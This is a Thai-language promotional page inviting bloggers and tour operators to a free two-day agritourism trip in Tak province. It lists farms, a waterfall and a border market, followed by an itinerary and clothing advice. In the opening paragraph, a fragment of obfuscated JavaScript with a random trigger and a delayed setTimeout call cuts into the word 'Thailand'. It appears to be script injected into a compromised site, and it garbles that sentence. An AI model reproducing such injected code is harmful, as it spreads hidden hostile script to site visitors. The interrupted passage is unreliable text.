การท่องเที่ยวเชิงเกษตร จังหวัดตาก

รับสมัคร blogger/ผู้ประกอบการนำเที่ยวในประเทศ เข้าร่วมกิจกรรมท่องเที่ยวเชิงเกษตรจังหวัดตาก

ขอเชิญเหล่า Blogger ที่มีใจรักในการท่องเที่ยวหรือต้องการสร้างประสบการณ์ใหม่ๆ สร้างแรงบันดาลใจใหม่ๆ ร่วมสัมผัสประสบการณ์แบบ Unseen Thailandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and ไปพร้อมกับพวกเรา แบบ 2 วัน 1 คืน ที่จังหวัดตาก เยี่ยมชมไร่ปฐมเพชร ไร่เตรยาวรรณ สวนเทพพิทักษ์ น้ำตกพาเจริญและตลาดริมเมย แล้วจะรู้ว่า “ตากมีมากกว่าที่คุณคิด”

สนใจลงทะเบียน ฟรี ไม่มีค่าใช้จ่าย

ปิดรับสมัคร 17 มิถุนายน 2562 (รับจำนวนจำกัดเพียง 100 ท่าน)

สอบถามข้อมูลเพิ่มเติมได้ที่ event@mvisioncorp.com

บุคคลทั่วไปลงทะเบียนที่นี่

ไร่ปฐมเพชร

ไร่ปฐมเพชร เป็นแหล่งรวบรวมกุหลาบนานาสายพันธุ์ มีการสาธิตการทำดอกกุหลาบมหัศจรรย์ที่สามารถเก็บรักษาความสวยงามของดอกกุหลาบไว้ได้นาน มีผลไม้ตามฤดูการมากมายให้เลือกชมและเลือกซื้อ

ไร่เตรยาวรรณ

หากใครที่เดินทางมาตากจะต้องไม่พลาดที่นี่แน่นอน ไร่เตรยาวรรณเป็นไร่ขนาดใหญ่แบ่งเป็นหลายโซนทั้งสวนผลไม้ สวนหิน สระน้ำ มีจุดถ่ายภาพแนวสตรีทอาร์ตเก๋ๆ หลายมุมเลย และภายในไร่ยังมีร้านกาแฟสุดหรูที่สร้างในสไตล์ผสมผสานระหว่างไทยโบราณกับยุโรปตะวันตกย้อนยุค ประดับและตกแต่งด้วยวัตถุโบราณหายาก โดยลงทุนสร้างกว่า 30 ล้านบาท

น้ำตกพาเจริญ

น้ำตกพาเจริญเป็นแหล่งท่องเที่ยวทางธรรมชาติที่อยู่ในบริเวณที่ทำการอุทยานแห่งชาติน้ำตกพาเจริญ เป็นน้ำตกหินปูนรอบน้ำตกมีธรรมชาติที่สวยงามร่มรื่น มีเส้นทางศึกษาธรรมชาติรอบน้ำตกระยะทางประมาณ 1.5 กิโลเมตร และในช่วงเดือนกรกฎาคม-เดือนกันยายนของทุกปีนักท่องเที่ยวจะได้ชมความงามของดอกกระเจียวสีส้ม “ฉัตรทอง” ที่มีสายพันธุ์อยู่ในจังหวัดตากเพียงแห่งเดียว

สวนเทพพิทักษ์

สวนผลไม้ที่มีชื่อเสียงโดยเฉพาะทับทิมสายพันธุ์ใหม่ที่มีรสชาติหวาน กรอบ เมล็ดสีแดงสดหรือที่รู้จักกันในชื่อ “ทับทิมศรีปัญญา” ที่ได้กลายมาเป็นของดีประจำอำเภอพบพระ ผลทับทิมมีขนาดใหญ่ เนื้อสีแดงเข้ม รสชาติหวานจัด และปัจจุบันทางสวนได้พัฒนาทับทิมขึ้นใหม่อีกสายพันธุ์ พร้อมตั้งชื่อให้ว่า “ทับทิมศรีสยาม” อันเป็นทับทิมไร้เมล็ด ทับทิมที่สวนเทพพิทักษ์จะมีผลผลิตทั้งปีโดยเฉพาะในช่วงเดือนเมษายน – เดือนมิถุนายน และช่วงเดือนพฤศจิกายน – เดือนธันวาคม ที่จะมีผลผลิตมากเป็นพิเศษ

ตลาดริมเมย

ตลาดริมเมย เป็นสถานที่ติดต่อค้าขายระหว่างไทย-พม่า เป็นตลาดขายสินค้านำเข้าจากประเทศอินเดียและจีน ซึ่งตลาดแห่งนี้เป็นแหล่งค้าขายอัญมณีที่มีชื่อเสียง เช่น หยก ทับทิม และพลอยสีจากพม่า มีทั้งแปรรูปเป็นอัญมณีเรียบร้อยแล้ว และยังไม่ได้แปรรูปอีกมากมาย ตลอดจนงานหัตถกรรม เฟอร์นิเจอร์ วัตถุโบราณจากไม้สัก

ไร่ชาวหลังสวน

ไร่ชาวหลังสวนเป็นร้านอาหารและฟาร์มออร์แกนิคซึ่งปลูกพืชผลปลอดสารพิษ คุณสามารถรับประทานอาหารไปพร้อมๆ กับสัมผัสบรรยากาศธรรมชาติอันสงบ ร่มรื่นและยังมีของฝากให้เลือกซื้อติดไม้ติดมือกลับไปด้วย

กำหนดการวันที่ 1

08.00ลงทะเบียนนัดหมายออกเดินทางพร้อมกัน ที่ศาลาว่าการ จังหวัดตาก
10.30ถึงไร่ปฐมเพชร ทำกิจกรรมกุหลาบแห้งและเยี่ยมชมไร่สวนผสม
12.00รับประทานอาหารกลางวันที่ไร่ชาวหลังสวน ชมการสาธิตการผลิตแยมและไอศกรีม ตารางกิจกรรม
14.00ถึงไร่เตรยาวรรณ เยี่ยมชมสวนและร้านกาแฟ พร้อมจุดถ่ายภาพ
15.00เดินทางถึงอุทยานแห่งชาติน้ำตกพาเจริญ
17.00ร่วมรับประทานอาหารเย็น บาร์บิคิว
19.00เดินทางเข้าที่พัก PS Hotel แม่สอด

กำหนดการวันที่ 2

09.00เดินทางสู่ อ.พบพระ
10.00ท่องเที่ยวเชิงเกษตรที่สวนเทพพิทักษ์ ชมไร่ทับทิมขนาดใหญ่ และดูการสาธิตวิธีผลิตน้ำทับทิมสดจากไร่
11.00เดินทางไปตลาดริมเมย เยี่ยมชมตลาด ซื้อของฝากตามอัธยาศัยและรับประทานอาหารเที่ยงบนรถระหว่างทาง
14.00ถึงศาลาว่าการจังหวัดตาก เดินทางกลับโดยสวัสดิภาพ

* สำหรับโปรแกรมการท่องเที่ยวเชิงเกษตรนี้ เหมาะสำหรับ นักท่องเที่ยวเชิงธรรมชาติ, Blogger ,Reviewer, ผู้ประกอบการท่องเที่ยวภายในประเทศ ที่สนใจในวิธีท่องเที่ยวเชิงเกษตร ขอให้ทุกท่านที่จะเดินทางกับคณะท่องเที่ยว ช่วยคิดและเผยแพร่ สามารถนำไปต่อยอดให้กับทุกชุมชนในอนาคต และร่วมรักษาธรรมชาติพร้อมเพรียงกัน

การแต่งกาย

เนื่องจากการเข้าชมสถานที่ต่างๆ โดยเฉพาะเขตอุทยานอาจต้องมีการเดินเข้าป่า ทางทีมงานจึงขอแนะนำการแต่งกายเพื่อให้เหมาะสมกับสภาพภูมิประเทศดังนี้

  • การแต่งกายควรเป็นชุดรัดกุม ใส่สบาย ไม่รัดแน่นจนเกินไป
  • ใช้โทนสีที่กลมกลืนกับธรรมชาติ เฃ่น เขียว น้ำตาล
  • หมวกมีประโยชน์มากในการเดินป่า หมวกที่เลือกใช้จะเป็นหมวกปีกหรือหมวกแก๊ปก็ได้
  • เสื้อที่สวมใส่ควรเป็นเสื้อแขนยาว ทั้งนี้เพื่อป้องกันแมลง หนามและแสงแดด เนื้อผ้าควรเป็นชนิดที่ซับน้ำได้ดี เพื่อจะได้ช่วยระบายความร้อนได้ดี
  • กางเกงควรเป็นกางเกงที่สวมสบาย ไม่รัดมากจนเกินไป
  • รองเท้า ควรเป็นรองเท้าเดินป่าหุ้มส้นที่แข็งแรงและสวมใส่พอดี

ลงทะเบียนสมัครได้ที่นี่

ปิดรับสมัคร